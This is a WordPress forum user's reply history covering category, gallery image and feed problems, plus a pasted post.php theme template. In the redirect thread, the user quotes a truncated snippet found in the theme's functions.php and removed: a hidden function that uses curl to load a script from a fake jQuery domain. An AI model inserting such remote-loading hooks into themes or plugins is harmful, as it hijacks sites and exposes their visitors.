mabidpasha
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Old categories not showing in wp-admin categories tabDeactivated all plugins(directory) tried the basic theme… nothing worked.
Forum: Fixing WordPress
In reply to: Old categories not showing in wp-admin categories tabI thought there would be a shortcut for this 🙁 this is a lot of work. Let me see.
Still, anybody have any more specific solutions?
Forum: Fixing WordPress
In reply to: How to set exit time for Google ImagesDaiv,
Thanks for your reply. Can you give me a url to any guide of what you are saying or give some more details about the solution?
Thanks.
Forum: Fixing WordPress
In reply to: Blog automaitcally redirectingThis topic is resolved. Thanks.
Forum: Fixing WordPress
In reply to: Blog automaitcally redirectingYeah,
I resolved the issue somehow… I opened all the php files in the theme on notepad++ and searched for the jqueryc.com found it in functions…
I found
// Load custom libraries used in theme
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;I just removed this link and everything came back to normal.. I am not sure why the theme worked after I first installed and after 2 days of installation suddenly theme stopped working.
Still if you know anything and can tell me about it I’ll be very thankful.
Thanks.
Forum: Fixing WordPress
In reply to: Blog automaitcally redirectingI have imported more than 300 posts from blogger, changed all the permalinks manually. Removing the installation completely will be a huge loss of time for me… isn’t there any other way?
Thanks.
Forum: Fixing WordPress
In reply to: Gallery attachment page showing images in low resolutionWould be glad to try your suggestions 🙂
Forum: Fixing WordPress
In reply to: Gallery attachment page showing images in low resolutionor fit to the post-content area (regarding to the maximum width of post-content-area)
Forum: Fixing WordPress
In reply to: Gallery attachment page showing images in low resolution400×600
Forum: Fixing WordPress
In reply to: Gallery attachment page showing images in low resolutionSo basically attachment page is showing Bar-Refaeli-14-200×300.jpg instead of the real image Bar-Refaeli-14.jpg.
I want image to show as much bigger as it can.
Forum: Fixing WordPress
In reply to: Gallery attachment page showing images in low resolutionI never said that they aren’t working…. if you see the image size at http://www.modelsfame.com/wp-content/uploads/2012/09/Bar-Refaeli-14.jpg it is way too bigger than what the website actually showing in the attachment page at http://www.modelsfame.com/hot-pictures-of-bar-refaeli-gallery/bar-refaeli-14/
Forum: Fixing WordPress
In reply to: Gallery attachment page showing images in low resolutionImage still exists in the link http://www.modelsfame.com/wp-content/uploads/2012/09/Bar-Refaeli-14.jpg
but it is taking to http://www.modelsfame.com/wp-content/uploads/2012/09/Bar-Refaeli-14-200×300.jpgForum: Fixing WordPress
In reply to: How to prevent Gallery images to show up in home feedHow to prevent Gallery images to show up in home feed is now Resolved… All thanks to tiaanswart.
Forum: Fixing WordPress
In reply to: How to prevent Gallery images to show up in home feedtiaanswart
I only changed that code from content to excerpt in the file…. didn’t needed to add “more” tag in the posts and it works fine…. Exactly the way I wanted.
I love you man 🙂 Keep up the good work.
Forum: Fixing WordPress
In reply to: How to prevent Gallery images to show up in home feedpost.php
post-single.php
post-page.php
post-nonresult.phpAll from theme folder
I am pasting post.php here.<?php global $theme; ?>
<div <?php post_class(‘post clearfix’); ?> id=”post-<?php the_ID(); ?>”>
<h2 class=”title”>” title=”<?php printf( esc_attr__( ‘Permalink to %s’, ‘themater’ ), the_title_attribute( ‘echo=0’ ) ); ?>” rel=”bookmark”><?php the_title(); ?></h2>
<div class=”postmeta-primary”>
<span class=”meta_date”><?php echo get_the_date(); ?></span>
<span class=”meta_categories”><?php the_category(‘, ‘); ?></span><?php if(comments_open( get_the_ID() )) {
?> <span class=”meta_comments”><?php comments_popup_link( __( ‘No comments’, ‘themater’ ), __( ‘1 Comment’, ‘themater’ ), __( ‘% Comments’, ‘themater’ ) ); ?></span><?php
} ?>
</div><div class=”entry clearfix”>
<?php
if(has_post_thumbnail()) {
?>“><?php the_post_thumbnail(
array($theme->get_option(‘featured_image_width’), $theme->get_option(‘featured_image_height’)),
array(“class” => $theme->get_option(‘featured_image_position’) . ” featured_image”)
); ?><?php
}
?><?php
the_content(”);
?></div>
<?php if($theme->display(‘read_more’)) { ?>
<div class=”readmore”>
#more-<?php the_ID(); ?>” title=”<?php printf( esc_attr__( ‘Permalink to %s’, ‘themater’ ), the_title_attribute( ‘echo=0’ ) ); ?>” rel=”bookmark”><?php $theme->option(‘read_more’); ?>
</div>
<?php } ?></div><!– Post ID <?php the_ID(); ?> –>